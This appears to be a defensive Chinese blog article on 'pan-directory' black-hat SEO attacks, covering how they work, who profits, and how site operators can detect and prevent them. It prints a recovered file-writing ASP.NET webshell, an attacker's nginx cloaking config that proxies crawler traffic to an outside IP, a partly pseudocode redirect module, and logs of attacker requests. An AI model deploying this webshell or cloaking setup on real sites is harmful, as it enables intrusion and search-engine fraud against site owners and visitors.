作者:尚贤达猎头公司 谭工
【摘要】
当前网络安全形势严峻,大量中小企业网站遭受泛目录攻击,对企业品牌形象及经营生产造成严重影响。网站运营者应对泛目录攻击的现状、具体形式、产业链、危害、监测方法及防御措施有深入的了解,制定好策略,做好网站安全防御措施,以使遭受攻击的风险降至最低。
【关键词】
网站安全;SEO;泛目录SEO;泛目录攻击;监控;防御
【abstract】
The current situation of network security is severe, with a large number of small and medium-sized enterprise websites suffering from pan directory attacks, which have a serious impact on the brand image and business production of enterprises. Website operators should have a deep understanding of the current situation, specific forms, industry chain, hazards, monitoring methods, and defense measures of pan directory attacks, formulate strategies, and implement website security defense measures to minimize the risk of attacks.
【Keywords】
website security; SEO; Pan directory SEO; Pan directory attack; monitor; defense
【目录】
一、网站安全形势简介
二、SEO、泛目录SEO
三、泛目录攻击
四、泛目录攻击的监测与防御
五、总结
参考文献
一、网站安全形势简介
截至2023年,网络安全仍然是全球范围内的一个重大挑战。随着技术的进步,攻击者的方法也在不断演变,使得网站面临的安全威胁更加复杂和多样化。尽管没有具体的全球统计数据显示每个网站被攻击和挂马的确切数量,但有一些关键的趋势和数据可以提供一些洞察。
一)、网络攻击的主要类型
1.DDoS攻击(分布式拒绝服务攻击):通过使网站超负荷运转来使其无法处理合法流量。
2.SQL注入:攻击者在数据库查询中注入恶意SQL代码,从而获取未授权的数据库访问。
3.跨站脚本攻击(XSS):攻击者将恶意脚本植入用户浏览的页面上。
4.挂马:在网站上植入恶意软件,通常用于感染访问者的计算机。
5.钓鱼攻击:通过假冒的网站或电子邮件诱骗用户提供敏感信息。
6.零日攻击:利用尚未公开的漏洞进行攻击。
7.泛目录攻击:攻击者通过入侵网站并在其上植入泛目录程序,短时间内生成大量页面让搜索引擎收录,从而获得搜索引擎流量并获利。
二)、安全状况和趋势
1、增长的攻击频率:随着越来越多的商业和个人活动在线上进行,网站遭受攻击的频率有所增加。
2、更多的自动化工具:攻击者使用自动化工具扫描漏洞,导致即使是小型网站也可能成为攻击的目标。
3、数据泄露事件:数据泄露事件持续增多,这些事件经常涉及敏感的个人信息和企业数据。
4、高风险行业:特定行业如金融服务、医疗保健和零售等因其持有大量敏感数据而成为高风险目标。
尽管采取了许多预防措施,网络安全依然是一个持续的战斗,需要技术、策略和教育的多方面努力。对于企业和个人用户而言,了解最新的安全趋势和保护措施是非常重要的。
泛目录攻击由于不破坏网站的正常运行,更具隐秘性,以至于难以防范、危害面广、破坏程度深。网站运营者应该引起重视。
二、SEO与泛目录SEO
一)、SEO
SEO是搜索引擎优化(Search Engine Optimization)的缩写,它是一种通过优化网站内容和结构来提高网站在搜索引擎中的自然排名的技术和过程。SEO的目标是增加网站在搜索引擎结果页(SERP)上的可见性,从而吸引更多的访问流量,从而获得客户咨询,进一步达成业务。
二)、泛目录SEO
泛目录SEO是一种黑帽SEO技术。是通过程序在一个高权重的网站上生成无限个目录和页面,页面包含在目录文件夹中,而页面中也包含一个随机长尾关键词或文章,这就是泛目录。利用搜索引擎的漏洞,大量、快速收录这些生成的目录和文章,从而使目标关键词、品牌词在搜索引擎中排名靠前,提高访客点击率,最终获得收益。
泛目录系统一般包括内容文件、模板文件、关键词文件、跳转文件、蜘蛛文件等几个部分组成。
泛目录系统的部署一般是通过租用一些权重较高的平台站点,解决网站快速收录和排名的问题,租用者都是企业产品推广人员。
泛目录SEO与传统的SEO的区别在于,传统的SEO能针对具体网站进行优化,使经优化网站对搜索引擎更友好,网站的关键词能在搜索引擎中获得较好的排名从面是获得流量。而泛目录SEO实际上是寄生于大型高权重站点平台的目录中的一个系统,大量生成目录和包含推广关键词的页面,继承平台的高权重让搜索引擎快速、大量收录所生成的目录和页面,从而获得排名。泛目录SEO能让推广的关键词在搜索引擎中获得靠前排名,但不能针对具体网站进行优化,当平台中的泛目录程序被删除后,它所生成的目录、页面也无法访问。
目前市面上霸屏词之类的推广即属泛目录SEO的一种。
三、泛目录攻击
因权重较高的平台站点租赁费用昂贵,同时随着法律的完善,站点平台不会将目录租用给第三方用于灰色词的推广。由此造成风险外溢,广告主只得另辟蹊径,转而雇佣黑客来攻击网站,将泛目录程序植入被黑网站中。
泛目录程序能在短时间内大量生成目录和灰色词(赌博、色情、电影、游戏、小说)页面网址,当跳转程序检测到搜索引擎抓取网站时,将生成的页面地址反馈给搜索引擎,从而让搜索引收录。普通访客在搜索引擎中搜索到这些结果并点击后,跳转程序会将访问请求重定向到第三方服务器。第三方服务器将雇主的推广页面Response给普通访客。
泛目录攻击最初只是攻击大型、权重高的网站,随首自动化扫描工具的技术的提高,很多中小型、权重低的网站也无法幸免。网站所有者不限于企业,经笔者长期观察,很多基层政府、学校以及众多行政事业单位网站也在攻击之列。
某网站被泛目录程序攻击后生成的目录
某网站被泛目录程序攻击后生成的网址被百度收录(真实网址用www.xxxxa.com代替)
一)、泛目录攻击目的
黑客通过攻击网站,将泛目录程序植入网站中,目的在于获取搜索引擎流量,从而获利。
二)、被攻击后的网站症状
1、收录暴涨,搜索引擎在短时间内大量收录索引与自身网站不存在的网址页面。
某网站在短时间内被百度大量收录
2、流量暴涨,这些暴涨的流量主要来源与网站无关的关键词
某环保网站在短时间涌现大量灰色词流量
3、经尝试,市面现有杀毒软件无法扫描和清理.
4、通过百度站长抓取诊断工具能成功抓取页面,但宿主网站文件中并不存在相应的实体目录和文件。
4、来源检测,当直接在浏览器中输入网址时,显示404页面或者显示网页不存在;当通过搜索引擎搜索结果访问时,则能打开。有的泛目录攻击者会屏蔽PC端访客,而选择只让移动端访客能打开。
5、第三方服务器一般部署在境外,据观察以香港、美国、德国居多。
6、黑客能过大量不同IP持续访问网站,以填充目录和关键词。据统计这些用来填充目录和关键词的IP有来自国内、香港、日本等地,IP有可能是黑客的实际IP,也有可能是肉鸡的IP。
7、Windows平台和linux平台网站都可被攻击。
三)、危害
1、降低宿主网站所属机构品牌可信度
2、破坏服务器和网站文件,严重影响业务开展。
3、造成数据泄密。
4、网站被搜索引擎惩罚,最终导致网站整站被K。
四)、泛目录攻击产业链
泛目录攻击产业链是一个复杂的黑色经济体系,涉及到多个环节和角色。泛目录攻击产业链中包括广告主、攻击者、脚本编写者、漏洞发现者、洗钱者等角色。他们通过分工合作,形成了一个完整的黑色产业链。
1、广告主:是产业链上的金主,向黑客组织提出产品推广需求(包含关键词库、内容、推广网站等)、支付佣金。
2、脚本编写者:负责开发用于泛目录脚本和木马。
3、漏洞发现者:利用自动化扫描工具寻找并利用软件漏洞,帮助攻击者更容易地入侵网站。
4、攻击者:利用网站漏洞上传Webshell等黑客工具,篡改网页内容,植入恶意代码,并持续上传目录和关键词等。
5、洗钱者:负责将通过泛目录攻击获得的非法收益“洗白”,使其看起来合法。
6、宿主网站:被入侵并成功植入运行泛目录程序的网站。
泛目录攻击是一个涉及多个环节和角色的复杂体系,随着技术的发展和法律的完善,其攻击手段也在不断演变和升级。为了应对这些威胁,网站管理员需要加强安全防护,及时修补漏洞,提高安全意识;用户则需要提高警惕,避免点击不明链接,定期更新软件和操作系统,使用安全软件进行防护。
五)、入侵过程及原理
(一)、入侵网站
1、漏洞扫描,通过自动化扫描工具扫描工具对目标服务器进行漏洞扫描。
2、获取网站物理目录
3、上传文件操作工具或文件到网站物理目录,以下是黑客通过漏洞上传到某网站XX目录中的一个WebService文件sendsms.asmx,上传成功后可以通过网址远程访问。
<%@ WebService Language="C#"Class="SendSms" %>
using System.Web.Services;
using System;
using System.Diagnostics;
using System.IO;
[WebService(Namespace="")]
public class SendSms : WebService
{
[WebMethod]
public string send(string mobile)
{
try{
string pwd = System.Web.HttpContext.Current.Request.QueryString["cd3x"];
string action = System.Web.HttpContext.Current.Request.QueryString["action"];
if(pwd == "admin" && action == "dir"){
return System.Web.HttpContext.Current.Request.PhysicalApplicationPath;
}
if(pwd == "admin" && action == "file"){
byte[] outputb = Convert.FromBase64String(mobile);
string orgStr= System.Text.Encoding.Default.GetString(outputb);
string filename = System.Web.HttpContext.Current.Request.QueryString["name"];
System.IO.StreamWriter f2 = new System.IO.StreamWriter(filename, false);
f2.WriteLine(orgStr);
f2.Close();
f2.Dispose();
return "Success";
}
}catch(Exception e){
}
return "send Success";
}
}
这段代码是一个使用C#编写的ASP.NET Web服务,它定义了一个名为SendSms的类,该类继承自WebService。这个Web服务类提供了一个公开的send方法,该方法通过WebMethod属性标记为可远程调用的Web方法。
下面是对代码中关键部分的分析:
1)、[WebMethod]: 属性标记了send方法,使得这个方法可以作为Web服务的一部分被远程调用。
2)、public string send(string mobile): 定义了send方法,它接受一个名为mobile的字符串参数,并返回一个字符串。
3)、string pwd = System.Web.HttpContext.Current.Request.QueryString["cd3x"];: 从查询字符串中获取名为cd3x的参数值,并将其存储在变量pwd中。
4)、string action = System.Web.HttpContext.Current.Request.QueryString["action"];: 从查询字符串中获取名为action的参数值,并将其存储在变量action中。
5)、权限检查:如果pwd是"admin"并且action是"dir",则返回当前应用程序的物理路径。
6)、文件写入:如果pwd是"admin"并且action是"file",则将mobile参数从Base64解码,然后写入到通过查询字符串指定的文件名filename的文件中。
访问方式示例:
https://www.example.com/xx/sendsms.asmx?cd3x=admin&action=file&name=D:\www_site\huanbao\ anner\r.aspx
4、通过文件操作工具将泛目录程序文件植入网站中。
某网站通过工具拦截黑客创建文件的截图。
通过日志管理系统查询到对应时间段的操作,找到了黑客的访问记录,黑客访问了sendsms.asmx文件,在请求参数中,黑客填了物理地址、文件名等提交给sendsms.asmx,试图通过sendsms.asmx文件来创建植入泛目录系统,以下示例中的真实网址已用Example Domain代替,物理目录经修改:
| 序号 | 日期 | 时间 | 被访网址 | 请求参数 | 访客IP地址 |
| 1 | 2024-7-28 | 15:42:29 | https://www.example.com/Scripts/sendsms.asmx | - | 103.140.187.67 |
| 2 | 2024-7-29 | 9:33:40 | https://www.example.com/Scripts/sendsms.asmx | - | 185.18.222.20 |
| 3 | 2024-7-29 | 9:34:17 | https://www.example.com/Scripts/sendsms.asmx | op=send | 185.18.222.20 |
| 4 | 2024-7-29 | 9:34:43 | https://www.example.com/Scripts/sendsms.asmx | cd3x=admin&action=dir | 119.42.144.99 |
| 5 | 2024-7-29 | 9:35:04 | https://www.example.com/Scripts/sendsms.asmx | cd3x=admin&action=file&name=D:\www_site\huanbao\www.example.com\websit\r.aspx | 119.42.144.99 |
| 6 | 2024-7-29 | 9:36:51 | https://www.example.com/Scripts/sendsms.asmx | cd3x=admin&action=file&name=D:\www_site\huanbao\www.example.com\websit\upload/banner\r.aspx | 119.42.144.99 |
| 7 | 2024-7-28 | 15:42:29 | https://www.example.com/Scripts/sendsms.asmx | - | 103.140.187.67 |
| 8 | 2024-7-29 | 9:33:40 | https://www.example.com/Scripts/sendsms.asmx | - | 185.18.222.20 |
| 9 | 2024-7-29 | 9:34:17 | https://www.example.com/Scripts/sendsms.asmx | op=send | 185.18.222.20 |
| 10 | 2024-7-29 | 9:34:43 | https://www.example.com/Scripts/sendsms.asmx | cd3x=admin&action=dir | 119.42.144.99 |
| 11 | 2024-7-29 | 9:37:58 | https://www.example.com/Scripts/sendsms.asmx | cd3x=admin&action=file&name=D:\www_site\huanbao\www.example.com\websit\jobg\r.html | 119.42.144.99 |
以上11条操作都被拦截,IP地址也被自动加入到防火墙予以阻止。
上述IP 地址归属地及运营商
| 序号 | IP地址 | 归属地 | 网络运营商 |
| 1 | 103.140.187.67 | 日本 东京都 东京 | EstNOC OY |
| 2 | 185.18.222.20 | 日本 东京都 东京 | Latitude.sh |
| 3 | 119.42.144.99 | 中国香港 | Netsec Limited |
二)、部署泛目录程序
通过文件操作工具对上传泛目录系统进行配置。
泛目录系统主要包含以下部分
1、内容文件
内容文件是保存用来生成网页随机内容的文件,早期黑客会把内容文件上传到宿主网站目录以供调用,但内容文件承担填充生成的网页内容的作用,体积通常较大,达几十甚至上百兆,容易被网站管理员发现而遭到删除。后期,黑客一般将内容文件部署到第三方服务器上。
2、关键词文件
关键词文件是保存用来生成随机网页关键词的文件,该文件中包含大量预先设定的用来推广的关键词,以供调用,插入到生成的网页中。同内容文件一样,早期黑客会把关键词文件上传到宿主网站目录以供调用。后期,黑客一般将内容文件部署到第三方服务器上。
3、目录文件
目录文件是保存用来生成随机网站目录文件的文件,该文件中包含大量预先设定的用来生成网站目录的文件,黑客也可通过实际访问文件操作工具来更新目录文件。
4、模板文件
预先设置的网页框架,用来填充内容和关键词,混合宿主网站的品牌词以及宿主网站的部分内容,从而持续生成不同的网页。同内容文件、关键词文件一样,早期黑客会把模板文件上传到宿主网站目录以供调用。后期,黑客一般将内容文件部署到第三方服务器上。文件的生成步骤,一般放在第三方服务器上完成。
5、跳转文件
是泛目录攻击系统中一个非常重要的文件。实际上是一个具有隐藏和感染文件能力的http模块,承担截获访问请求、判断访客来源及类型、根据条件重定向等功能。以下示例是一个c#编写的http模块,具备截获访问请求,根据条件判断重定向的功能。
using System;
using System.Collections.Generic;
using System.Web;
using System.Text.RegularExpressions;
using System.Web.Caching;
using System.Net;
using System.Text;
using System.IO;
using System.Configuration;
namespace www.sunsharer.cn
{
public class RealTimeTrafficModule : IHttpModule
{
public void Init(HttpApplication context)
{
context.BeginRequest += new EventHandler(Context_BeginRequest);
context.EndRequest += new EventHandler(Context_EndRequest);
}
private void Context_BeginRequest(object sender, EventArgs e)
{
// 获取开始时间并存储在缓存中(假设使用URL作为键)
//载入泛目录配置文件
HttpApplication app = sender as HttpApplication;
if (app != null)
{
string visitorStartTimeKey = HttpContext.Current.Request.Url.AbsoluteUri;
// DateTime startTime = DateTime.UtcNow; // 存储当前时间作为开始时间
DateTime startTime = DateTime.Now;
HttpContext.Current.Cache[visitorStartTimeKey] = startTime; // 将开始时间存储在缓存中
}
app.Dispose();
}
private void Context_EndRequest(object sender, EventArgs e)
{
HttpApplication app = sender as HttpApplication;
try
{
if (app != null)
{
// 获取被访URL、浏览器版本和访客IP
string domain_0 = app.Request.Url.Host; // 初始化为 null
string host_0 = app.Request.UserHostAddress;//客户端IP
string userAgent_0 = null; // 初始化为 null
if (app.Request.UserAgent != null) // 检查是否为 null
{
userAgent_0 = app.Request.UserAgent;//获取访客用户代理,
if(判断userAgent_0是否是搜索引擎的UserAgent)
{
app.Response.Redirect("https://www.example.com");//是否是搜索引擎的UserAgent,则重定向到第三方服务器,https://www.example.com为示例网址。第三方服务器将生成的页面地址Response给搜索引擎。
}
}
else
{
// 处理 null 的情况,比如使用默认值或抛出异常
// 这里使用一个示例的默认值,你可以根据你的需求修改
userAgent_0 = "";
}
string referrer_0 = null; // 初始化为 null
if (app.Request.UrlReferrer != null) // 检查是否为 null
{
referrer_0 = app.Request.UrlReferrer.ToString();//获取访客来源,
if(判断acceptLanguage_0是否来自于搜索引擎)
{
app.Response.Redirect("https://www.example.com");//如果来自于搜索引擎,则重定向到第三方服务器,https://www.example.com为示例网址。
}
}
else
{
// 处理 null 的情况,比如使用默认值或抛出异常
// 这里使用一个示例的默认值,你可以根据你的需求修改
referrer_0 = "";
}
string[] languages = app.Request.UserLanguages;
string acceptLanguage_0 = string.Join(",", languages);//
/* if (app.Request.UserLanguages != null) // 检查是否为 null
{
acceptLanguage_0 = app.Request.UserLanguages.ToString();
}
else
{
// 处理 null 的情况,比如使用默认值或抛出异常
// 这里使用一个示例的默认值,你可以根据你的需求修改
acceptLanguage_0 = "";
}*/
if (app.Request.UrlReferrer.AbsoluteUri != null) // 检查是否为 null
{
domain_1 = new Uri(app.Request.UrlReferrer.AbsoluteUri);//获取域名
}
if (domain_1!= null) // 检查是否为 null
{
domain_0 = domain_1.Host;
}
else
{
// 处理 null 的情况,比如使用默认值或抛出异常
// 这里使用一个示例的默认值,你可以根据你的需求修改
domain_0 = "www.example.com";
}*/
string url_0 = app.Request.Url.AbsoluteUri;
string responseHeader_0 = "";
if (app.Request.Headers != null)
{
responseHeader_0 = app.Request.Headers.ToString();
}
else
{
responseHeader_0 = "";
};
string Qstring_0 = app.Request.QueryString.ToString();//查询字符串
string os_0 = "";
string browser_0 = app.Request.Browser.Version;
}
app.Dispose();
}
catch(Exception ex)
{
Console.WriteLine(ex);
}
}
public void Dispose()
{
}
}
}
1、目录访问控制文件等
用来配置跳转文件的控制条件。以下是黑客上传到服务器上用来配置nginx 对目录重定向的文件:
location /bookjm8{
set $flag 0;
if($http_user_agent(baiduspider|googlebot|Bytespider|soso|bing|sogou|yahoo|Bytespider|sohu-search|yodao|robozilla|msnbot|yisouspider|360Spider)) {
set $flag 1;}
if($http_referer(m.baidu.com|m.sogou.com|wap.baidu.com|3g.baidu.com|sogou.com|toutiao.com|.so.com|.sm.cn)){
set $flag 1;
}
if ($http_referer ~* (site:|site%|=site|inurl|inurl:|inurl%)){
set $flag 0;
}
if ($flag = 0) {
return 404;
}
proxy_pass http://38.207.6.80/;
proxy_connect_timeout 60;
proxy_read_timeout 60;
proxy_send_timeout 60;
proxy_buffer_size 32k;
proxy_buffers 4 32k;
proxy_busy_buffers_size 64k;
proxy_temp_file_write_size 1024m;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
这段代码的作用是:对于访问/bookjm8路径的请求,根据请求的来源(User-Agent和Referer)来判断是否允许访问。如果是搜索引擎爬虫或特定的移动网站发起的请求,则允许访问并代理到指定的服务器。如果请求不符合条件,则返回404错误。同时,还设置了一些代理服务器的配置参数,以优化代理性能和安全性。如此配置,在PC端的搜索结果中无法访问,增加了对网站管理人员的迷惑性。/bookjm8 是泛目录自动生成,泛目录程序在接到黑客指令后,可以限生成类似的目录。
三)、持续填充目录和关键词
当上面两步操作完成后,黑客通过持续访问文件操作工具,给泛目录系统增加目录和关键词。
| 序号 | 日期 | 时间 | 请求方法 | 黑客IP地址 | 泛目录网址 |
| 1 | 2024/1/23 | 9:19:27 | GET | 122.228.19.79 | /bigzhudw/86420 |
| 2 | 2024/1/4 | 8:28:17 | GET | 140.249.15.134 | /etassqtp/36212.aspx |
| 3 | 2023/12/29 | 14:22:48 | GET | 122.228.19.56 | /zooiqqai/0414446.aspx |
| 4 | 2023/12/26 | 10:18:04 | GET | 140.249.15.155 | /joyuzc/72450.html |
| 5 | 2023/12/25 | 7:17:48 | GET | 61.164.118.145 | /nubyils/20231204 |
| 6 | 2023/12/24 | 8:39:27 | GET | 140.249.15.158 | /bigrvri/20231204 |
| 7 | 2023/12/23 | 17:47:40 | GET | 140.249.15.163 | /nubshnu/41870/wubtuak.html |
| 8 | 2023/12/22 | 2:12:12 | GET | 140.249.15.172 | /foxovr/6740386/egqbd.aspx |
| 9 | 2023/12/22 | 6:41:45 | GET | 140.249.15.168 | /goddfyhb/6262720.html |
| 10 | 2023/12/19 | 12:49:00 | GET | 125.88.223.179 | /joybak/664217.html |
日志管理中监控到的黑客持续填充某网站泛目录的网址数据(部分)
四、泛目录攻击的监测与防御
一)、监测
1、做为一个网站管理员,应该养成定期查看分析网站日志的习惯,借助网站日志分析系统可以大幅度提高工作效率并及时发现问题。
2、关键词监测,利用百度站长之类的系统定期查看流量与关键词,发现出现与网站无关的关键词流量,应提高警惕,进一步分析找出这个关键是从网站的具体页面来的。
3、利用site命令,定期与百度、360、搜狗等搜索引擎中查看收录量以及所收录的页面,如收录结果中出现了无关页面,应进一步找到原因。
4、流量监控,利用SEO工具,定期查看流量,如流量突然暴涨,应该引起注意,进一步分析原因。
5、文件审计,在确保数据完整性和安全性起重要作用。网站管理员应该对网站重要目录、文件保存一份列表,以记录目录(文件)的数量、路径、名称、大小、创建日期等内容。发生风险事件时,可以用来进行比对,以找出被篡改或者破坏的文件。
二)、预防
(一)、打好漏洞补丁
做为系统管理员应该明白任何系统都有漏洞,都有被黑客攻破的可能,做好大部分应该做的工作,可以将风险降至最低。
漏洞按垂直方式来划分的话,主要可以分成三个类型
1、操作系统漏洞
及时更新操作系统,打好系统补丁。
2、应用系统(网站服务器软件)漏洞
IIS漏洞
如IIS8存在如下一些漏洞
1、IIS 8跨站点脚本攻击,攻击者操纵用户信息和传播恶意软件。
2、SQL Injection(SQL注入),IIS 8通过Web前端进入数据库世界。
3、用户会话管理漏洞,攻击者操纵IIS 8应用程序会话。
4、IIS 8弱密码策略,往往缺乏入侵者锁定。
Nginx的漏洞
Nginx也存在安全漏洞,这些漏洞可能允许攻击者执行代码、读取敏感信息或者中断服务。
例如,CVE-2013-4547是一个Nginx解析SSI时的漏洞,攻击者可以通过构造特殊的请求利用此漏洞执行任意命令。
解决方法以上网站服务器软件通常是升级到最新的版本,或者应用安全补丁。
3、网站自身漏洞
网站在设计时留下的漏洞,如文件上传、数据库操作等,应该及时检测修复。
(二)、做好网站服务器软件配置工作
1、目录保护
用特定软件,对网站的物理目录进行写入、删除、修改做出限制。
2、配置好网站服务器软件的请求筛选功能
1)、在请求筛选的查询字符串中将网站物理目录设为false,以为黑客将网站物理目录作为写入文件的参数;
2)、限制查询字符串的长度。
3)、拒绝包含数据库操作语句或者包含数据库保留字(select、insert、update、delete 等)的查询字符串。
4)、根据实际情况,限制访问特定类型的文件,如.zip, .asp.zip,.rar,.7z,等
5)、限制特定用户代理(User-Agent)的IP访问网站。
3、定期做好网站程序文件和数据文件的备份。
三)、被黑后的处理方法
(一)、收集、保留、整理好相关证据,以备用法律武器惩罚作恶者。
(二)、仔细分析网站日志,找出黑客IP,加入防火墙予以阻止。
(三)、清理植入的泛目录文件,无法清理干净的,应该重装服务器系统,用备份文件恢复网站,不建议使用原被黑的网站程序。
(国)、处理好被百度等搜索引擎收录的泛目录索引。
五、总结
泛目录攻击有完整的产业链,从业人员触犯破坏计算机信息系统罪。据相关数据显示,泛目录攻击危害面广,大量中小企业网站受害,对企业品牌推广甚至生成经营造成严重的破坏。作为企业的网站管理员应该加强学习业务知识,做好服务器和网站的维护以及数据备份工作,力争将遭受攻的风险降至最低。
【参考文献】
无
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
